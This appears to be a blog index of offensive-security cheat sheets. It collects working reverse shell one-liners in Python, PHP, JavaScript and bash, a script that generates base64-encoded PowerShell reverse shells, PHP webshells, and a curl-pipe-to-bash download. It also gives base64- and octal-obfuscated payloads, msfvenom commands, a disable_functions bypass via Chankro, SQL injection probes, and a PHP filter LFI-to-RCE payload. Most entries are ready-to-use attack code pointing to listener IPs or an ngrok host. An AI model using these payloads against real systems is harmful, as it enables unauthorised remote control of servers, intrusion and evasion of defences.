Gajendra Mahato

🐍 Python Reverse Shell Cheat Sheet

This cheat sheet shows useful Python reverse shell one-liners and a PowerShell reverse shell generator in Python.

1. Python3 Reverse Shell One-liner

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.50.114",3232));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Connects back to attacker IP 10.9.50.114 on port 3232. Uses socket, duplicates file descriptors for stdin/stdout/stderr. Spawns an interactive /bin/sh shell. Works on most Linux systems with Python 3 installed.

2. Python Script to Generate PowerShell Reverse Shell Command (Base64 Encoded)

#!/usr/bin/env python3
import sys
import base64

def help():
    print("USAGE: %s IP PORT" % sys.argv[0])
    print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
    exit()

try:
    (ip, port) = (sys.argv[1], int(sys.argv[2]))
except:
    help()

payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (ip, port)
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmdline)

How to use: Run this script: ...

January 13, 2026 · 2 min

🐘 Bypassing `disable_functions` in PHP for Reverse Shell Using Chankro

Sometimes system, exec, shell_exec, and other dangerous PHP functions are disabled. Chankro helps us bypass these by using LD_PRELOAD and custom shared objects.

🧠 Step-by-Step Guide

🔍 1. Identify Target Architecture

Access the phpinfo.php page on the target. Look for architecture info:
Architecture => x86_64 → 64-bit
Architecture => i686 or i386 → 32-bit

💣 2. Create Shell Script

Prepare a Bash reverse shell in a file named shell:
echo "bash -c 'exec bash -i >& /dev/tcp/10.10.14.5/9001 0>&1'" > shell

⚙️ 3. Install Chankro

If not installed: ...

January 13, 2026 · 2 min

🐘 PHP Reverse Shell & Webshell Cheat Sheet

This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios.

1. Basic Webshell Using system()
<?php system($_GET['cmd']); ?>
Usage: Execute commands by passing the cmd parameter in the URL. Example: http://target.com/webshell.php?cmd=ls

2. PHP Reverse Shell Using One-liner with fsockopen()
php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");'
Run this on the target if you can execute PHP code directly. Connects back to your listener on port 3232.

3. PHP Reverse Shell Using Named Pipe & Netcat
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?>
Uses a named pipe (/tmp/f) for a stable reverse shell. Requires nc (Netcat) on the target machine.

4. PHP One-liner Bash Reverse Shell (Backgrounded)
<?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?>
Runs the bash reverse shell in the background. Useful to keep the shell persistent after the HTTP request ends.

🔥 Tips & Notes
Replace IP and ports with your attacker machine’s IP and desired port.
Use nc -lvnp <port> on your machine to catch the reverse shell.
Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()).
If nc is not installed on the target, try pure PHP or bash based shells.
Always check if the web server user has permissions to execute commands or create named pipes.
Combine these shells with Chankro or php-reverse-shell for better evasion.

January 13, 2026 · 2 min

🐚 JavaScript Reverse Shell & Command Execution Cheat Sheet

Useful JavaScript snippets for remote command execution, reverse shells, and post-exploitation via Node.js or vulnerable eval() injection.

📄 Basic Reverse Shell using child_process.exec()
require('child_process').exec('nc 0.tcp.in.ngrok.io 18402 -e /bin/sh')
📌 Listener on attacker side: nc -lvnp 18402

📄 Spawn a shell via spawn() method
require('child_process').spawn('/bin/sh', [])
This spawns an interactive shell on the server if injected.

📄 Execute a simple Linux command
require('child_process').exec('ls -la', function(error, stdout, stderr) { console.log(stdout) })

📄 Download and execute a script (e.g., reverse shell script)
require('child_process').exec('curl http://10.10.14.5/rev.sh | bash')

📄 Reverse shell using bash and TCP
require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/9001 0>&1')
💡 Use this when nc -e is restricted or not available. ...

January 13, 2026 · 2 min

Basic Reverse Shell Payloads

bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Reverse Shell Payload with Encoded Command
bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash
bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}

Best way to escape bad characters (Recommended)
echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh
curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh'
bash$IFS'/tmp/revshell.sh'

Reverse Shell by using octal escape sequences

Generating RevShell (escape sequence)
echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'
echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'

Generating RevShell (Hex escape sequence)
echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g'

Executing RevShell (Never forget to URL encode if you are sending it via HTTP/S)
printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh

Additional Shell Options and Tools
Don’t forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility: ...

January 13, 2026 · 1 min

Comprehensive SQL Injection Vulnerability Exploration Tutorial

Identifying SQL Injection Vulnerability Parameters

Comments in SQL
-- MySQL Linux style
--+ MySQL Windows style
# Hash (URL encode when used)
--+- SQL comment
;%00 Null Byte
` Backtick

To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include:
id=[Nothing]
id='
id=''
id="
id=`
id=')
id=")
id=`)
id='))
id="))
id=`))

Examples of SQL Injection Testing
Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include: ...

January 13, 2026 · 2 min

File Inclusion

File Inclusion and Path Traversal At a Glance

File inclusion is the method for applications and scripts to include local or remote files at run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed. There are two types: Local File Inclusion (LFI), where the application includes files on the current server, and Remote File Inclusion (RFI), where the application downloads and executes files from a remote server. ...

January 13, 2026 · 6 min

Generating Reverse Shells with Metasploit's msfvenom.

Note: Always remember to use the same payload in msfconsole as you used to generate it in msfvenom.

Linux Reverse Shell (extension doesn’t matter for Linux)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf
Payload Type: Shell Reverse TCP
Suitable for: Linux systems, Netcat listener required.

Windows x64 Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe
Payload Type: Windows x64 Meterpreter Reverse TCP
Suitable for: 64-bit Windows systems, spawns a Meterpreter session. ...

January 13, 2026 · 2 min

HTTP Status Code

These codes indicate that the request was successfully received, understood, and accepted.
200 OK: The request was successful.
201 Created: The request was successful, and a resource was created.
202 Accepted: The request has been accepted but not yet processed.
204 No Content: The request was successful, but there is no content to send back.

3xx: Redirection
These codes indicate that further action is needed to complete the request.
301 Moved Permanently: The resource has been permanently moved to a new URL. ...

January 13, 2026 · 3 min

Payloads and Outputs

Target File: .htaccess
Output with PHP String Filters

No Filter Applied
Output: Testing PHP Filter

Payload: php://filter/convert.base64-encode/resource=.htaccess
Output: VGVzdGluZyBQSFAgRmlsdGVy

Payload: php://filter/string.rot13/resource=.htaccess
Output: Grfgvat CUC Svygre

Payload: php://filter/string.toupper/resource=.htaccess
Output: TESTING PHP FILTER

Payload: php://filter/string.tolower/resource=.htaccess
Output: testing php filter

Payload: php://filter/string.strip_tags/resource=.htaccess
Output: Testing PHP Filter
This filter removes any HTML or PHP tags from the file contents.

PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?>

Payload for LFI to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami
Output: www-data

January 13, 2026 · 1 min